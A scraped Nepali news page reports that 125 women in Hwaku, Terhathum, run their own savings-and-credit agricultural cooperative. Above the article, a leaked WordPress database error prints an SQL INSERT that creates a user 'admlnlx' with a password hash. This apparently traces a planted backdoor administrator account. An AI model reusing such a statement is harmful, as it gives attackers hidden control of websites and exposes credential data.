WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BR8xxIpNhk8V1dPRgByTTB7VNOlvve0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 00:50:15', '', 'admlnlx', 'admlnlx')
तेह्रथुम, माघ १९ –
ह्वाकु गाविसका महिलाले आफ्नै नेतृत्व र सेयर लगानीमा ‘जालपादेवी महिला कृषि सहकारी संस्था’ सञ्चालन गरेका छन् । ।
ह्वाकुको नौवटै वडाका १० वटा आमा समूहमा आबद्ध १२५ महिलाले सेयर लगानी गरी सो सहकारी सञ्चालन गरेको अध्यक्ष बलमाया गुरुङले बताउनुभयो । सहकारीमा आबद्ध सेयर सदस्यले न्यूनतम १० देखि २० कित्तासम्म सेयर लगानी गरेका छन् ।
सुरुवातमा सहकारीको कुल पुँजी रु तीन लाख ३९ हजार रहेको सचिव मेनुका ओलीले जानकारी दिनुभयो । सहकारीले बचत, ऋण लगानी तथा असुलीको कारोबार समेत सुरु गरेको छ । ग्रामीण भेगका महिलाको जीविकोपार्जनमा सुधार ल्याउने उद्देश्यले सहकारी सञ्चालन गरेको ओलीको भनाइ छ । ‘देउराली सोसाइटी’ गैरसरकारी संस्थाले महिलालाई सहकारी संस्थातर्फ प्रवर्धन गरेको हो । -रासस